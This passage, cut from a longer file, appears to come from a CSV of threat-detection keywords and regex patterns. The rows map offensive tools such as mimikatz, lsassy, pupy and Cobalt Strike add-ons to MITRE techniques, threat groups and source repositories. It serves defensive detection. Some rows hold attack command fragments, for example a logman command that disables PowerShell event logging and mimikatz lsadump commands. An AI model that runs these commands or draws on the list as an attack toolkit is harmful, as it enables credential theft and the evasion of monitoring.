TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","51326" "*login-securite/conpass*",".{0,1000}login\-securite\/conpass.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","1","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","51330" 
"*login-securite/lsassy*",".{0,1000}login\-securite\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51331" "*login-securite/lsassy*",".{0,1000}login\-securite\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51332" "*loginsight.thrift*",".{0,1000}loginsight\.thrift.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in massive ransomware campaign that exploits public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","51333" "*logit(`New subscriber: TOBROWSER__*",".{0,1000}logit\(\`New\ssubscriber\:\sTOBROWSER__.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","51334" "*logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets*",".{0,1000}logman\supdate\strace\sEventLog\-Application\s\-\-p\sMicrosoft\-Windows\-PowerShell\s\-ets.{0,1000}","offensive_tool_keyword","logman","disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider","T1562.004 - T1070.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51335" "*LogonPasswords\*-LogonPasswords.txt*",".{0,1000}LogonPasswords\\.{0,1000}\-LogonPasswords\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","51338" "*LogonPasswords\.AllUniqueNTLM.txt*",".{0,1000}LogonPasswords\\\.AllUniqueNTLM\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","51339" "*LogonTracer*",".{0,1000}LogonTracer.{0,1000}","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","6","10","2878","457","2024-06-21T06:06:32Z","2017-11-24T06:07:49Z","51340" "*logs/maitm.log""*",".{0,1000}logs\/maitm\.log\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","51342" "*logs/Responder-Session.log*",".{0,1000}logs\/Responder\-Session\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51343" "*logs/ridenum.log*",".{0,1000}logs\/ridenum\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51344" "*logs/shares-with-SCF.txt*",".{0,1000}logs\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51345" "*logs/theHarvester.py.log*",".{0,1000}logs\/theHarvester\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 
- T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51346" "*logToBeaconLog*",".{0,1000}logToBeaconLog.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","51348" "*lolbin.exe *",".{0,1000}lolbin\.exe\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","51349" "*LOLBins/NetLoader.xml*",".{0,1000}LOLBins\/NetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","51350" "*Lolipop.php - Edited By KingDefacer*",".{0,1000}Lolipop\.php\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","51351" "*LOLSpoof.exe*",".{0,1000}LOLSpoof\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","51352" "*Londor.exe -t Coverage*",".{0,1000}Londor\.exe\s\-t\sCoverage.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51353" "*Londor.exe -t Script*",".{0,1000}Londor\.exe\s\-t\sScript.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51354" "*looCiprian/GC2-sheet*",".{0,1000}looCiprian\/GC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","51355" "*lookupsid.py -hashes :* *@* 0*",".{0,1000}lookupsid\.py\s\-hashes\s\:.{0,1000}\s.{0,1000}\@.{0,1000}\s0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51356" "*lookupsid.py*",".{0,1000}lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","51357" "*looneypwner.sh *",".{0,1000}looneypwner\.sh\s.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","51358" "*LooneyPwner-main*",".{0,1000}LooneyPwner\-main.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","51359" "*loot_memory.py*",".{0,1000}loot_memory\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - 
T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","51360" "*loot_mysql_passwords(*",".{0,1000}loot_mysql_passwords\(.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","51361" "*lorenzedzyzyjhzxvlcv347n5piltxamo755pzqpozh5l47kj7mxueid.onion*",".{0,1000}lorenzedzyzyjhzxvlcv347n5piltxamo755pzqpozh5l47kj7mxueid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51362" "*lorenzezzwvtk3y24wfph4jpho27grrctqvf6yvld7256rnoz7yg2eid.onion*",".{0,1000}lorenzezzwvtk3y24wfph4jpho27grrctqvf6yvld7256rnoz7yg2eid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51363" "*lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion*",".{0,1000}lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51364" "*Lost connection to team server! Sleeping 60 second and retrying?*",".{0,1000}Lost\sconnection\sto\steam\sserver!\sSleeping\s60\ssecond\sand\sretrying\?.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","51365" "*LostMyPassword.exe*",".{0,1000}LostMyPassword\.exe.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51366" "*LostMyPassword.zip*",".{0,1000}LostMyPassword\.zip.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51367" "*LostMyPasswordx64.zip*",".{0,1000}LostMyPasswordx64\.zip.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51368" 
"*lotus2john.py*",".{0,1000}lotus2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51369" "*Lovely-Potato*",".{0,1000}Lovely\-Potato.{0,1000}","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","N/A","10","2","142","30","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z","51370" "*lpfcbjknijpeeillifnkikgncikgfhdo*",".{0,1000}lpfcbjknijpeeillifnkikgncikgfhdo.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","51371" "*ls -la netkit.ko*",".{0,1000}ls\s\-la\snetkit\.ko.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","51374" "*ls -r 
$ExfilDocname*",".{0,1000}ls\s\-r\s\$ExfilDocname.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","51375" "*L'S', L'e', L'D', L'e', L'b', L'u', L'g', L'P', L'r', L'i', L'v', L'i', L'l', L'e', L'g', L'e'*",".{0,1000}L\'S\',\sL\'e\',\sL\'D\',\sL\'e\',\sL\'b\',\sL\'u\',\sL\'g\',\sL\'P\',\sL\'r\',\sL\'i\',\sL\'v\',\sL\'i\',\sL\'l\',\sL\'e\',\sL\'g\',\sL\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51376" "*LSA dump programe (bootkey/syskey) - pwdump and others*",".{0,1000}LSA\sdump\sprograme\s\(bootkey\/syskey\)\s\-\spwdump\sand\sothers.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - 
Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51378" "*lsa_decryptor.py*",".{0,1000}lsa_decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","51379" "*lsa_decryptor_nt*.py*",".{0,1000}lsa_decryptor_nt.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","51380" "*lsa_secrets.md*",".{0,1000}lsa_secrets\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51381" "*lsadecryptor_lsa_decryptor*",".{0,1000}lsadecryptor_lsa_decryptor.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","51382" "*lsadump.exe*",".{0,1000}lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","51383" "*lsadump::*",".{0,1000}lsadump\:\:.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird 
- CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51384" "*lsadump::backupkeys*",".{0,1000}lsadump\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
